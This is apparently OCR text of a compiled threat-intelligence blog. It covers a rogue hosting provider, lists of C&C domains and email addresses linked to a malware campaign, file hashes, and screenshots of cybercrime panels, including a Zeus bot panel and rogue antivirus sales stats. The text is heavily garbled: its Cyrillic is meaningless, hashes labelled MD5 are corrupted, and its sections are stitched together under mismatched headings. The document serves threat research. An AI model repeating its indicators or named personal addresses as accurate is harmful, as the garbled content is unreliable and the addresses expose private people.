Sercumot 6 CeGe uncmectso Nagpaagence C Gomme weer 140 thecerenn uacGoumereeht 


Opasseamas Saece Hamgercn KapTeeot-no span neren, KaK arUmpORMeRs, fan HM Clanmense Ot 
Marereine: AO Gomuse pAsEpOR 


8 paagere Damenareen mQyITCR EapTRa C MagnCH 8 Qe NomeNaHel AOR AOPSOLO reGe 
wenceesa, Xoveus offpamet. toTO agqacce wartosecy, aotoped reGe He Geapaneen? 
Ommpastmicn no costae @erate afiaaya } 


Dose meneme Jace ee yerngire eapteax, © ccHoeHoM NocemuyeRee CoThenge, ApeO. nOTOpeA 
AAAT CAO HERE abcorot MoGok uancees, Sey MeTERUA - KOMey Patou HeQerat ) Tax 
ame paagen Ho noGaet garments 6 CeGe H ApYTHe spot Mager OT NONEQerIeEA AO BOCEpECEAR 


Bowens tose Jace eco Gematenn - captimas Apo sec, Neto, COeHe Ht jemMy. 


Yasnnas * coGome nomantms Inte HamgCn Eaptm ¢ paInrenun Npeeomnaen 
marca, Pagaer noo moGom, sxtowe?t 6 Coe xapheest Mpo sce. «tO CRAIAND ¢ oGoeR= 
POMacTEOR, HRUREAe POIOENE Tous, Soy E HTN 

Knere xo Gyemot capteen yrwete 6 paagere ‘wach eam” Koytwe. Goma, pepaere - 
ee 8 atom payee 

Gomu0ro meme sectpeset payee “AGL actel. cotopes eamounet © code ve ose 
Tuciny EAD TNOK NpeQuIIeao: Ate meyeepOS Kaa muttyTT TOT usin MOR Npeguet wom 
OG Lacrenth peGerary nomoreryt Haw colt ) 

floumuo Aeteh caphess opepereree: eae 1 Ate wa fate, Keo nie 
someocnrymmuero 6 paagene ESTE ANT HalQITe Hume tate Otep etn 4 Sotot payer 
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- NOonuT aL 
Oncratipa, Freon 1248 XVOC Ean rr 


2 Folens me namACIRAK TH 02 Yapitewmes Guameres GO 
MANORS ELE FONNESCE 18 Tay 


ae 7 = - Cares “~ “ Comes Some 
CAMOE UMTAEMOE — soe = 
yOwseet uyucuce sacpoese 
Hero ne Hakyeno 
DEKE HOROCTH Meg ce Spo wamet “pc ecte ob ae 


Bee meson 
ad fee meeocrs ace 


Mhormrme) osnerme MOP IHA Hit MANDO CHC 3a oma MepAmnCentecTn eo Ye panes 


Teatot Aeeer gnepenn 90 Mnnnmapaee Rennepse aa YR DR rem MA POC YEE TR Cmr IRAN Coren 


CVRRT NDE LTORATe DOL CHRCLNA 
Grearec 
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WHO 1s WHO 1 , roBOr ¢ 
KTO «cr. KTO BYIMM CIibILUM TOBOPHM Oog<uvf BSA 


+ Ovemunaa npemes: 6 
Pectem saoepaseerca 
CTpowtemectec Acgonone 
cApa tuna» 


+Kanaapeance» Speactanet 
motes (pam AencKna 
Anca TposeoTOuren UM 1 


Hy, BOT #t Kote. Copoc crcan Nopowenxo 8 ynum 


Nepenosace wmecnapen 
+Poctex» passnsoct 
PPOMmULMeHITyD ID meverD 


Vonatenaa tema COCP 
anrosyc-rurant «AA-2> 


Nponnrecnne 6noc ep: 
conqann napTeo 
«flessonpa THeccaeA Toop. 


io; - Patnep Jone yeactrmmn 
) 2 


arr) Panawr y Rete ay 


Related personal email address accounts known to have been involved in the campaign: 
p.henningsson@centrum.cz 
milimil0702@mail.com 
amandabuilderama@mail.com 
hiepgp.bn@gmail.com 
romer@mail.com 

arik@hostar.org 

dr.x@europe.com 
JawdahKoury@tutanota.com 
presmike2034@msn.com 

kingston _trevino@protonmail.com 
pol.michael@post.com 
ben.grochot@tdfs.com 

joaquin _garcia@gmx.ch 

andre _roy@mail.com 
bolekrejci@centrum.cz 


iflatley@openmailbox.org 
22401 


mikalay@icloud.com 
jada.okeefe15@mail.com 
manuel.herez@centrum.cz 
olivier _servgr@mail.com 
colemanmail@mail.com 
lucasbenson@europe.com 
rgrey@tutanota.com 
tarob999@outlook.com 
mahuudd@centrum.cz 
pearliestehr@airmail.cc 
ysrb@outlook.com 
hr.jagdeep@gmail.com 
erick _bolton@protonmail.com 
yyb enjoy@126.com 
ken@m4v.me 
rickey.gevers@gmail.com 
tarob666@outlook.com 
declan.jefferson@sapo.pt 
ysrb.riady@gmail.com 
contact rzeteny@keemail.me 
pravich83@gmail.com 
qq5598002@gmail.com 
leila77@cock.li 
klaoja@cock.li 
loisoji@firemail.cc 
rvanholsted@yahoo.com 
ulli_ neu80@mail.com 

ma _picarlo@centrum.cz 
mattew.barnes@aol.com 
trajboj@centrum.cz 
softmainnew@yandex.com 
gerpsz@airmail.cc 


gabrielromao@sapo.pt Related malicious and fraudulent C &C (Command and Control) do- 
mains known to have been involved in the campaign: 


hxxp://1007.net 
hxxp://acledit.com 
22402 


"In gaz we trust"? I'd rather change GazTranzitStroylInfo’s vision to [1]HangUp Team’s infa- 
mous - "in fraud we trust". It is somehow weird to what lengths would certain cybercriminals 
go to create a feeling of legitimacy of their enterprise. 


AS29371 - gaztranzitstroyinfo LLC - 91.212.41.0/24 based in Russia, Sankt Peterburg, 
Kropotkina 1, office 299, is one of them. Let’s "drill" for some malicious activity at GazTranzit- 
StroyInfo, and demonstrate how cybercriminals are converging different hosting providers to 
increase the lifecycle of their campaigns. 
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hxxp://adobeincorp.com 
hxxp://aeroservicemax.com 
hxxp://akamaisoftupdate.com 
hxxp://appservice.site 
hxxp://appservicegroup.com 
hxxp://autoupdater.org 
hxxp://beststreammusic.com 
hxxp://bestweddingparty.org 
hxxp://bg-abvmail.pw 
hxxp://busseylawoffice.com 
hxxp://cdnmsnupdate.com 
hxxp://cdnverify.net 
hxxp://checkmalware.info 
hxxp://ciscosupports.com 
hxxp://conflictzone.info 
hxxp://dancemusicstream.com 
hxxp://dateosx.com 
hxxp://daysheduler.org 
hxxp://dncvotebuilder.com 
hxxp://doorbehindentirerelationship.com 
hxxp://escochart.com 
hxxp://escochartzone.com 
hxxp://eservicesystems.net 
hxxp://esetsmart.org 
hxxp://eu-office365.top 
hxxp://experiencewithweakkid.com 
hxxp://familynearbysuitablenumber.com 
hxxp://faststoragefiles.org 
hxxp://foapp.info 

hxxp://foapp.top 

hxxp://focdn.store 
hxxp://fundseats.com 
hxxp://funnymems.com 
hxxp://genericnetworkaddress.com 


hxxp://georgia-travel.org 
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hxxp://globaltechengineers.org 
hxxp://groupsincevisibleend.com 
hxxp://hostapp.art 
hxxp://hourduringstrictsense.com 
hxxp://ikmtrust.com 
hxxp://info-update-otlk.com 
hxxp://kenlynton.com 
hxxp://linuxkrnl.net 
hxxp://loungecinemaclub.com 
hxxp://malwarecheck.info 
hxxp://mdcrewonline.com 
hxxp://meteost.com 
hxxp://microsofi.org 
hxxp://microsoftupdated.com 
hxxp://ministernetwork.org 
hxxp://miropc.org 
hxxp://moderntips.org 
hxxp://moldtravelgroup.com 
hxxp://msfontserver.com 
hxxp://msrole.com 
hxxp://mvband.net 
hxxp://mvsband.com 
hxxp://mvtband.net 
hxxp://myinvestgroup.com 
hxxp://mysent.org 
hxxp://nanetsdeb.com 
hxxp://naoasch.com 
hxxp://narrowpass.net 
hxxp://ndsee.org 
hxxp://newfilmts.com 
hxxp://ntpstatistics.com 
hxxp://onedrive-jp.com 
hxxp://pandorasong.com 
hxxp://placeuntilknownparent.com 
hxxp://politicweekend.com 
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hxxp://powerpolymerindustry.com 
hxxp://protonhardstorage.com 
hxxp://rapidfileuploader.org 
hxxp://rdsnets.com 
hxxp://reasonwithusefulpolicy.com 
hxxp://regvirt.com 
hxxp://reservecorpind.com 
hxxp://rpcnetconnect.com 
hxxp://sarmsoftware.com 
hxxp://schooltillhungryprocess.com 
hxxp://sdhjjekfp4k.com 
hxxp://secnetcontrol.com 
hxxp://servicetint.net 
hxxp://softwaresupportsv.com 
hxxp://soligro.com 
hxxp://spdup.art 
hxxp://ssl-mircosoft.com 
hxxp://star4vn.net 
hxxp://streetunderrelevantpeople.com 
hxxp://suncommunications.org 
hxxp://support-cloud. life 
hxxp://systembeforeniceparent.com 
hxxp://tablebeforehelpfulperson.com 
hxxp://thehomeofbaseball.com 
hxxp://topcinemaclub.com 
hxxp://truefashionnews.com 
hxxp://um10eset.net 
hxxp://unigymboom.com 
hxxp://updatepc.org 
hxxp://updatesystems.net 
hxxp://utmserver.com 
hxxp://virtsvc.com 
hxxp://visualrates.com 
hxxp://viters.org 


hxxp://webstp.com 
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hxxp://westmedicalgroup.net 
hxxp://windowsdefltr.net 
hxxp://workbench.run 
hxxp://worldimagebucket.com 


Related malicious and fraudulent C &C (Command and Control) domains known to have been 
involved in the campaign: 


hxxp://sarmsoftware.com 
hxxp://protonhardstorage.com 
hxxp://onedrive-jp.com 
hxxp://google-maps.us 
hxxp://scatteredsecrets.com 
hxxp://ip-phishing.com 
hxxp://adobeincorp.com 
hxxp://msfontserver.com 
hxxp://hineted.com 
hxxp://lovebluesky.com 
hxxp://hineter.com 
hxxp://psrrange.com 
hxxp://ikmtrust.com 
hxxp://citizenpolicenetwork.com 
hxxp://keatontax.com 
hxxp://michaelspontak.net 
hxxp://softwaresupportsv.com 
hxxp://reslocks.com 
hxxp://mvsband.com 
hxxp://vote4mike.net 
hxxp://rndversion.net 
hxxp://michaelspontak.com 
hxxp://reslocksmith.com 
hxxp://meadowhillbaptist.org 
hxxp://faststoragefiles.org 
hxxp://spontakfamily.com 
hxxp://okolonabaptist.org 
hxxp://mydateapp.net 
hxxp://ckswebmanagement.com 
hxxp://reservecorpind.com 
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hxxp://miropc.org 


hxxp://citizenpoliceacademynetwork.com 


hxxp://blogbymike.com 
hxxp://cksbusiness.com 
hxxp://generalsecuritycorp.org 
hxxp://newfilmts.com 
hxxp://naoasch.com 
hxxp://myinvestgroup.com 
hxxp://euronews24.info 
hxxp://damagedchristian.net 
hxxp://webstp.com 
hxxp://cksweb.net 
hxxp://damagedchristian.com 
hxxp://healthkeeping.org 
hxxp://taxprepcompany.org 
hxxp://akamaisoftupdate.com 
hxxp://citizen-police-academy.org 
hxxp://rpcnetconnect.com 
hxxp://citizen-police-academy.net 
hxxp://psrrange.org 
hxxp://psrrange.net 
hxxp://cvssucks.net 
hxxp://ckswebhosting.com 
hxxp://citizen-police-academy.com 
hxxp://meteost.com 
hxxp://cks-security.com 
hxxp://nanetsdeb.com 
hxxp://psr-range.com 
hxxp://church-web-ad.com 
hxxp://cvssucks.biz 
hxxp://psrrange. biz 
hxxp://checkwinframe.com 
hxxp://exitinterview-themovie.org 
hxxp://soligro.com 


hxxp://cksweb.org 
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hxxp://secnetcontrol.com 
hxxp://michaelspontak.space 
hxxp://testsnetcontrol.com 
hxxp://true-church.net 
hxxp://citizenpoliceacademynetwork.net 
hxxp://true-church.com 
hxxp://church-network.com 
hxxp://cooperchurch.org 
hxxp://ndsee.org 
hxxp://ministernetwork.net 
hxxp://ihatepolice.net 
hxxp://spontakfamily.net 
hxxp://ministernetwork.com 
hxxp://spontakfamily.org 
hxxp://appservicegroup.com 
hxxp://ckswebhost.net 
hxxp://tax-prep-company.com 
hxxp://eurosatory-2014.com 
hxxp://link-google.com 
hxxp://ntpstatistics.com 
hxxp://googlesetting.com 
hxxp://ya-support.com 
hxxp://evrosatory.com 
hxxp://esetsmart.org 
hxxp://set121.com 
hxxp://us-westmail-undeliversystem.com 
hxxp://us-mg7mail-transferservice.com 
hxxp://virtsvc.com 
hxxp://changepassword-hotmail.com 
hxxp://changepassword-yahoo.com 
hxxp://product-update.com 
hxxp://academl.com 
hxxp://dateosx.com 
hxxp://software-update.org 
hxxp://malwarecheck.info 
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hxxp://update-hub.com 
hxxp://soft-storage.com 
hxxp://ministernetwork.org 
hxxp://bulletin-center.com 
hxxp://rdsnets.com 
hxxp://globaltechengineers.org 
hxxp://as23-updater-symantec.org 
hxxp://um10eset.net 
hxxp://microsoftupdated.com 
hxxp://cdnverify.net 
hxxp://mamutmaill.com 
hxxp://conflictzone.info 
hxxp://trafficdirectsystem. biz 
hxxp://mybit.pro 
hxxp://mybtc. pro 
hxxp://socks.pm 
hxxp://rentin.asia 
hxxp://autoupdater. biz 
hxxp://autoupdater.org 
hxxp://drones.rent 
hxxp://xXmpp.000 
hxxp://isocks.pro 
hxxp://microdice.in 
hxxp://ipcheck.pro 


hxxp://dateless.pro 


Related malicious MD5s known to have phoned back to the same C &C server domains: 


0062eee42577b94119f4e128ed77a89aa26db206ab7 7a3cdaf98dc5ceclbc2b6 
01da20243c26cd677339cC978274776d331b0b2387cdb085527b7f7b68fclac59 
0860f29226069a732f988cb70ea6d51057d204d421bb709b8e759376b0c4d201 
Obe57d1244fefc679feb7aa9996e539481be7b8f4c9246817f81caa8c2f61a57 
0d260a4ea865773a86b3fcOfe89df92c86289c0266b1dd5ab8e3174839cb94c2 
102b0158bcd5a8b64de44d9f765193dd80df1504e398ce52d37b7c8c33f2552a 
12e171291f0deae69509a6ef2220cd9e0b9ed0e3e8651f33824fc627612be055 
137068491829178c260f417623192c18f18779d71149c9a8786fa4dd79c56325 
17234284a1e98e8350ec6ab7f5998b53d130495473945483b967e3dc9007250c 
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2005bbb82a8b2b4744188be58ef5b3892ca4af920bc645e1f334b2ae62a26624 
29cc2e69f65b9ce5fe04eb9b65942b2dabf48e417 70f0a49eb698271b99d2787 
2¢81023a146d2b5003d2b0c617ebf2eb1501dc6e55fc6326e834f05f5558c0ec 
2cea2alf53dac3f4fff156eacc2ecc8e98b1ab64f0f5b5ee1c42c69d9a226c55c 
33c187cfd9e3b68c3089c27ac64a519ccc951ccb3c74d75179c520f54f11f647 
378ef276eeaa4a29dab46d114710fcl4ba0a9f964f6d949bcbc5ed3267579892 
37f15647c26d475db805048d6592aa153533ac5f4373145c75e24012a51ad9f8 
42ed4ab65535ae382ed00a954a564bd13ac77731311400378af90bce2a463521 
45540fe0890bd5063fe2c464efd554e0e119d8501cc57cbec7e3577a9bb33a22 
48264394ab80a932b9df7520e8ec57e68a652c0302f8a8a5aCc2d1321b9a3c84e 
48albd2f7ee85e9676c4eea0b353ecda2f583fbd72ced688af660fe8fdf34bbe 
59070257ff9289683876d19678267f5b9449ce0884fa59e55cfdc60f9df2f41c 
5a02d4e5f6d6a89ad41554295114506540f0876e7288464e4a70c9ba51d24f12 
5f6b2a0d1d966fc4fled292b46240767f4acb06c13512b0061b434ae2a692fal 
62e33f4126d58ac36ea0e75102d36eae929ce210da80ead210342d2d91afb03b 
634795a3acbae8964bb31e3ebed7f29208844978a512fc26a8b9a51901f9Cab9 
6bbec6b2927325891cc008d3378d30941fe9d21e5c9bd6459e8e3ba8c78833c2 
6d626c7f661b8cc477569e8e89bfe5 787 70fca332beefealee49c20def97226e 
6dcb3f28255eaf07bb67b3515200b70391cb066111c5d67232704b367555b287 
739da178a3222e716ebc81bd5f4c731fd2be8705e4d3a9a32f4b2a8ff11888b5 
78adc8e5e4e86146317420fa3b2274c9805f6942c9973963467479cb1bbd4ead 
7a5cb45a3efcebbf49e18c4b2397dc2bdff039d9127a8119abe4c2f85a85elfO 
7b0e7f0b87a18cc2b847674987d3d0419954e9cf62720a9f6c5f38ecbae0c4f5 
7¢4101caf833aa9025fec4f04a637c049c929459ad3e4023ba27ac72bde7638d 
7f6f9645499f5840b59fb59525343045abf91bc57183aae459dca98dc8216965 
82fc44696d1c5ddfdd5338fcafb6a9dcf7a0796235cd58184d05a2f388ed7e9e 
8fe5b126a0e91ae1a523d2f4ab1c54f22d21015d5a23f798d5f257c532edd152 
94a9b5cb057e5b56262195485b621117eee24fd242db7bca77e9cb4e62857a05 
9f84d09b194f54f1lc8b8df56ba7cb1a500b8e000746cea5calfe6e3ae33b25ed 
a03387af06aa8c7a56a3b0f100fb1099f46676e3cb06c4ee7d1069d324c03caa 
a24220fd4a7767de8921fad0a939ebb974fc16ec1b7611cc8aeb4ad97f6737a2 
a37eda810ca92486bfb0elflb27adb7c9df5 7aafab686c000aeld6ec5d6f6180 
a97b1a792f7b53929a1cO1lbad9fc2bd606a15e8e32755daa15570e356baa0112 
ab71eddda2254007cb55887b94a16cb129d2992eeb9749216cb031e9f5f0b896 


b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05 
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b814fdbb7cfe6e5192fe1126835b903354d75bfb15a6c262ccc2cafl3a8ce4b6 
b9f23124a995e0ce8550cb916436626809c3aa5f20029fec257f114fdb82abc2 
bc637c6a9dd781674c258641466ba2acb3d128ef1f1a46c190c7b7eb947d8610 
c3ac697990bbb82f31d8f1d203ef7b032b3b43bcb916cecc354fa45151f7420d 
c6b9efdbfbfb1d34569d7a7e8bf9a7dfe7 6ff9b0deaa721564da8433f6a98e91 
c8087186a215553d2f95c68c03398e17e67517553f6e9a8adc906faa51bce946 
c817cal1763e42bc9e79a5538152ed78c13b3a650d5a2793ef9e3bfdd6f34905a 
cada4bcdbc96ae88de974b9066f84190c0512013e153e68b028b154c0bf8fddO 
ce487e055a57489c44c012e04b038998a5505da85b0e9e9406419bf91d9425ac 
d06be83a408f4796616b1c446e3637009d7691c131d121eb165c55bdd5ba50b4 
d1ed72922a3e987090ae3465ce27aa582e0101b0211780a0a796684a8f798da9 
d403ded7c4acfffe8dc2a3ad8fb848f08388b4c3452104f6970835913d92166c 
d4ea3fba15379fe36f08685d542eceec727¢c1755395b3ff7928a7d994bcfcf0a 
d5872edfe7942e52a2db5327b5439fc23d4535788fe68be9feb4c02e56233d9d 
d58f2a799552aff8358e9c63a4345ea971b27edd14b8eac825db30a8321d1la7a 
d88f2a4ea0bc9eb2acf8ba534e785cdc5fb7a07cc511df6b9e698d3ab8414a3a 
dcOa3ff3eb75e2d9e090ab6afa5d14396c27a5bebc4e5d6ac8a50e637eb5a1422 
dea3a99388e9c962de9eal 008FF35bc2dc66f67a911451e7b501183e360bb95e 
dfba21b4b7ele6ebd162010c880c82c9b04d797893311c19faab97431bf25927 
e9535d0d5e8e17779b49607988cdb0547efb6abb482dab497a5f0da87cbefc96 
eb413002be9e83b73e9b951758692d9d0492fab7500110ec1ce432cd6d26b6d7 
ec2f14916e0b52fb727111962dff9846839137968e32269a82288aee9f227bd4 
ecc5805898e037c2ef9bc52ea6c6e59b537984f84c3d680c8436cb6a38bdecdf4 
ee0a679844146e3d0eb623dc874b4d5ff151dddf16582774299ff65bcfff5b44 
f47da6948670b2390aab2a7701d85e3d505calce8cce139bfddcbf5f255dcc4b 
fo9fe6352696dc954cbbca514b652ce5e5104c1b6577a50dfddc925cd46f4970 
fcad263d0fe2b418db05f47d4036f0b42aaf201c9b91281dfdcb3201b298e4f4 
ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8 
Stay tuned! 
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18.6.20 Exclusive! - Exposing GRU’s Unit 74455 "NotPetya" Malware Gang - An OS- 
INT Analysis (2022-06-27 12:14) 


[ 


ke 
— 


22412 


AS#453 
GLOBEINTERNET 


AS44068 
APBITAL.AS 


The [2]recent peak of fake codecs (for instance video-info .info and sex-tapes-celebs .com 
serving [3]softwarefortubeview.40018.exe) puts the spotlight on GazTranzitStroyInfo and 
its connections with another rogue hosting provider in the face of AS48841, EUROHOST-AS 
Eurohost LLC, which was providing hosting infrastructure to the scareware domains part of 
[4]Conficker’s Scareware Monetization strategy, and continues to do so for a great deal of 
exploits/malware serving domains, next to AS10929 [5]NETELLIGENT Hosting Services Inc. 
where the infrastructure of the three hosting providers has converged. 


Let’s detail some malicious activity found at GazTranzitStroyInfo. The following are redi- 


rectors to live exploits/zeus config files/scareware found within AS29371 and pushed through 
blackhat SEO and web site compromises: 
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URL: linuxkrni.net/ 
IP: 52.45.178.122 - PTR: ec2-52-45-178-122.compute-1.amazonaws.com 
GeolP: @ US - AS14618 (AMAZON-AES, US) 


URL: linuxkrni.net/ 

IP: 52.45.178.122 - PTR: ec2-52-45-178-122.compute-1.amazonaws.com 
GeolP: @ US - AS14618 (AMAZON-AES - Amazon.com, Inc., US) 

URL: linuxkrni.net/ 

IP: 52.45.178.122 - PTR: ec2-52-45-178-122.compute-1.amazonaws.com 
GeolP: © US - AS14618 (AMAZON-AES - Amazon.com, Inc., US) 

URL: linuxkrni.net/ 

IP: 52.45.178.122 - PTR: ec2-52-45-178-122.compute-1.amazonaws.com 
GeolP: S US - AS14618 (AMAZON-AES - Amazon.com, Inc., US) 

URL: linuxkrni.net/ 


IP: 52.45.178.122 - PTR: ec2-52-45-178-122.compute-1.amazonaws.com 
GeolP: S US - AS14618 (AMAZON-AES - Amazon.com, Inc., US) 


Folks. 


Check out my latest analysis [2]here and consider sharing it with your friends and colleagues. 
Related [3]here. 


Sample screenshots of the GRU’s Unit 74455 "NotPetya" malware gang: 
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KapTvHki 4 OTKPbITKH 
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¥ Windows Security Center ewes 


©) Security Center 


Help protect your PC 


@) Resources” www Security essentials 


sessed epee erasers memncneesre re Security Center helps you manage your Windows security settings. To help protect your computer, 
make sure the three security essentials are marked OW. If the settings are not ON, follow the 


* Get the latest security and virus recommendations, To return to the Security Center later, open Control Panel, 
information from Microsoft What's new in Windows to help protect my computer? 
. Check for the latest updates from E 
Windows Update @ Firewall @ON ¢ 
* Get support for security-related 
issues ; 
%@ Automatic Updates @ON ¢ 


* Get help about Security Center 


.. 
"Gan tee ey Seek Saree F Virus Protection NOT FOUND « 


‘Windows did not find antivirus software on this computer. Antivirus software helps probect your 
computer against viruses and other securtty threats. Click Recommendations for suggested 
actions you can take. How does antivirus software otect my computer? 


Note: Windows does not detect all antivirus programs. 


Manage security settings for: 


> Internet Options @ Windows Firewall 


% Automatic Updates 


At Microsoft, we care about your privacy. Please read our privacy statement 
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Stay tuned! 
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18.6.21 Shots from the Wild West - Random Cybercrime Ecosystem Screenshots 
2021 - An OSINT Analysis (2022-06-27 17:02) 


Continuing the "Random Cybercrime Ecosystem Screenshots 2021" series I’ve decided to share 
yet another compilation of random cybercrime ecosystem screenshots courtesy of me Circa 
2010 while doing my research. Enjoy! Grab a copy of my personal memoir [1]here and catch 
up with my latest research [2]here. 


God bless and let’s don’t forget to nuke the rest! 
Sample random cybercrime ecosystem screenshots courtesy of me circa 2010: 
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#2 SAmBal - Paccpinka nourTbl 


Beero sarpyxeno 6 6asy: [0] 
He pacnostanHbs crpo: [0] 
3arpysure cracox| [~ Punerper 


Pacceinka | Gerarosure| 


Ci b HacTPOnKH 


_Lovparume acrvereie URL | 


[5] 
2009-03-01 - 2009-03-15 » Show 
User stats for period 2009-03-01 - 2009-03-15 : = 7 
- Ratio Ratio 
Date Visits  Buypage Loads Sales (Unig/Sales) — (Loads/Sales) Ch-backs Refunds Referals Sales Money 
2009-03-01 1 0 0 Q 1:0 1:0 Q Q 0.00 0.00 0 
2009-03-02 1 0 i] Q 1:0 1:0 Q Q 0.00 0,00 0 
2009-03-03 2 0 0 0 1:0 1:0 Q ia} 0.00 0.00 0 
2009-03-04 1 0 Q Q 1:0 1:0 Q Q 0.00 0.00 ia) 
2009-03-06 2 88 703 2 1:1 1:351 Q Q 0.00 49.94 49,94 
2009-03-07 7019 643 4189 41 1:171 1102 Q 1 0.00 998.80 998.8 
2009-03-08 5680 517 2489 _ BB 1:172 1:75 Q l 0.00 799.04 799,04 
2009-03-09 6999 553 3226 22 1:318 1:146 Q 3 0.00 474.43 474.43 
2009-03-10 7818 S06 3334 1:229 1:98 2 3 0.00 723.33 723.33 
5357 359 2647s 13 1:412 1:203 Q 0 0.00 328.51 328,51 
Total: 32880 62666 16588 145 1:226 1:114 2 8 0 3374.05 3374.05 
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Cybersquatting Detail Report for “sportsUSA" 


generated from data collected up to February 11, 2003 
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tukhemaj .cn 
rogkadej .cn 
wuhwasum .cn 
sipcojeq .cn 
tixwagoq .cn 
silzefos .cn 
popyodiw .cn 
cakpapaz .cn 
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Detet Beabeten Ansctt Gronk s Hike 


— - GS XM B BB ree/N2700.1revsn phe m-bas = [Cle -eenyedmin benutzer aniegen J cy 
5 BetNiet @ gut. com J sp0ng20bs Muskcprefi. CH) Logn to Hushmat -900_ 9 “Unves! Toumament 20. |.) Scene Fick” 
gig Post reply (©) Zeus :: Bots =] : 


Zeus :: Bots 


ec fetter 


Profile: root — ————__—— ——— 
GMT date: 13.09.2008 [E= }] Compio’s: [ | 


GMT time: 16:16:34 r 
P's: | 


Statistics: 
i uaeede eee on Et 
Summary Type! | Outside NAT ~ || Apply 


Botnet: | ) 
= Online bots ED AED ETE ETD EE TIED 
Remote commands Empty 

Logs: = 
Search 
Search with template 
Uploaded files 


System: 
Profiles 
Profile 
Options 
Logout 
Copyright © 2006-2007 ZeuS Group 
Fectsy S1700) Toceewe: veoh Ci <y 
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User stats for period 2009-03-01 - 2009-03-15 : 


- Ratio Ratio 
Date Visits Buy page Loads Sales (Unig/Sales)  (Loads/Sales) Ch-backs Refunds Referas Sales Money 


2009-03-01 15917 492 7980 «37 1:427 1:215 Q 1 0.00 1078.92 1079.92 
2009-03-02 14013 409 5925 | 28 1:500 1:211 0 2 0.00 779.22 | 779.22 
2009-03-03 | 9949 252 2832 (| «2k 1:473 1:134 0 2 0.00 569.43 569.43 
2009-03-04 11765 298 3482 | 12 1:980 1:290 0 0 0.00 399.64 359.64 
2009-03-05 7504 173 M64 2 1:3752 1:1532 Q Q 0.00 59.94 59.94 
2009-03-06 | 3023 106 3301 8 1:377 1:475 0 1 0.00 209.79 209.79 
2009-03-07 2370 113 6416 9 1:263 1:712 0 1 0.00 239.76 239.76 
2009-03-08 9841 278 6388 | 24 1:368 1:266 0 l 0.00 689.31 689.31 
2009-03-09 | 10936 358 5234 | 6 1:1822 1:872 0 4 0.00 59.94 59.94 
2009-03-10 | 12331 379 6862 24 1:513 1:265 2 2 0.00 482.05 | 482,05 
2009-03-11 | 5384 194 e333 | 13 1:414 1:64 0 0 0.00 388.31 388.31 
Total: 101933 3052 52817 184 1:553 1:287 7 14 0 4916.31 4916.31 
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WH Spend money easy! 
a= us 


Paysites thatdo convert! = Hr 
. i 


Per Install 


00: 


sn mest @ 


Per sign up 


Date Visits Buy page Loads 
2009-03-07 1472 50 561 
2009-03-08 2883 145 1393 
2009-03-09 1793 88 488 
2003-03-19 1050 Si 179 
2009-03-11 484 24 76 

Total: 7682 358 2697 


aus 
r 


Login 


Password 


wer 


[21] 


2009-03-01 - 2009-03-15 » 
User stats for period 2009-03-01 - 2009-03-15 : 


Show 


Sales Arnwouia) @ ouk/saes) Ch-backs Refunds Referals 
2 1:736 1:280 Q Q 0.00 
7 1:411 1:199 rf] Q 0.00 
0 1:0 1:0 0 0 0.00 
3 1:350 1:59 0 0 0.00 
2 1:242 1:38 O 0 0.00 
14 1:548 1:192 0 0 0 
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a, 


Recent ne ) 


Sales 


49.94 
174.79 
0.00 
74.91 
50.54 
350.18 


NYYLWUV OTAbIX! 
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Choose which features of Chameleon Tom you want to uninstall. 


Check the components you want to uninstall and uncheck the components you don't want to 
uninstall. Click Uninstall to start the uninstallation. 


Position your mouse 
over 4 component to 
see its description. 


Space required: 0.0KB 


Chameleon Tom uninstaller 


Date Visits Buy page Loads Sales 
2008-03-01 SF CC 1:0 1:0 Q Q 0,00 0,00 0 
2008-03-02 195 Be hak 1:112 Q Q 0.00 2497 24,97 
2009-03-03 100 9 | 49 Q. 1:0 1:0 Q Q 0,00 0.00 Oo 
| 2000-03-04 466 S2 215 2  1:233 1:107 Q Q 0.00 49.94 49.94 
2009-03-05 284 40 102 1:142 1:65 Q Q 0.00 49.94 49.94 
2009-03-05 «= od ltl KD 1:0 1:0 Q Q 0.00 0,00 0 
2009-03-07 2992 (as 1:0 1:0 Q Q 0,00 0,00 0 
_ 2008-03-08 24 00—ClC GS ea 1:0 1:0 Q Q 0,00 0.00 Oo 
_ 2009-03-09 214 34. | wz | a | aia 1:112 Q Q 0.00 24.97 24.97 
2009-03-10 182 30 = lds 1:0 1:0 Q Q 0.00 0.00 0 
2009-03-11 38 5 2 ao 1:0 | 1:0 Q Q 0.00 0.00 0 

Total: 2271 «-337)—Ss«1236-—s «6 1:378 1:206 ti) 0 0 149.82 149.82 
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72% of all spyware & not detected by the major Antivirus programs. Orty o 


Total downloads: 991592 


Last update Tuesday, May 19, 2008 


Total virus records 728674 tema 


gaan P tec 
@boreon ame 
S) TRUE LIFE STORIES: 


© Steve J of New York had hes software project 
stoien through a foyan that got into his computer 
through some internet ete Steve te still saffering 
from a strong depression 

Jason W was treed because he has been visting 
some prohiited evtemet shes fom an office 
computer. His boss opened the web browser's 
fustory and saw al the stes Jason has been 


visting Jason is stil unemployed 


Rogue security software: 
addedantivirusonline .com - 91.212.41.114 
addedantivirusstore .com 
addedantiviruslive.com 
addedantiviruspro.com 
countedantiviruspro.com 
myplusantiviruspro.com 
easyaddedantivirus.com 
yourcountedantivirus.com 
bestcountedantivirus.com 
yourplusantivirus.com 


purposely bul spyware removal tool such as Antivirus + cary 


W Antivirus + features: 


© Spyware removal. detects and removes spyware programs and 
trojan horses instatied on your PC 

© Homepage Monitor Tool - browser Hijackers, belonping to fre family of 
spyware and adware, are capaile of taleng control over your 
homepage and other favonte papes, and set an unknown wetsile as 
your homepage 

© System clean-up - clirwnates the Taces of your systern activites 

© Disc clean-up - securely destroys all the data on your old hard disc 

© Quarantine - The intected files that cannct be fixed or deleted are 
Maved to a quarantine foldet and duaplayed on the Quarantine pane 
of AntiVirus 

© User-friendly Wizard Mode . the Quick Scan Wizard will help you run 
8 an © the besc scan modes 

© Autorun Tool - if you want to know what apglications run automatically 
an your system after Window's boots 

© Open Port Tool . without a protective applcaton, your system ts 
Gelenseless and becomes highly vulneratie to Trojan programa 

© Mary other features 


© Is my PC infected with SpyWare? 


Q Do you recetve a large quantty of SPAM (unsohated 
advertisements)? 

© Your PC is running extremely slow? 

Q You are pestered by those horrible popup ads? 

O Your homepage keeps changing? 

©: New bors appear om your desktop? 

Q: Do you get toolbars in your browser that you dont want? 

@. Do you dewniosd any musk files forn the lriemet? 

Q Do you download and eistall free software frorn the Intemet? 
QO: De you use any P2P fe exchange systems (P2P) - for example 
